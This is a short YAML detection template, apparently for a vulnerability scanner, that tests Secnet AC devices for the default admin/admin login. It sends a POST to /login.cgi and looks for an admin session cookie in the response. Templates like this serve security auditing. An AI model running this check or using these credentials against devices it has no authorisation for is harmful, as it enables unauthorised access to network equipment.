漏洞描述
secnet ac default admin credentials were successful.
FOFA: secnet
id: secnet-ac-default-password
info:
name: secnet ac - Default Admin Login
author: ritikchaddha
severity: high
verified: true
description: |
secnet ac default admin credentials were successful.
FOFA: secnet
reference:
- https://bbs.secnet.cn/post/t-30
tags: default-login,secnet
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /login.cgi
body: user=admin&password=admin
expression: |
response.status == 200 &&
response.raw_header.bcontains(b'ac_userid=admin,ac_passwd=')
expression: r0()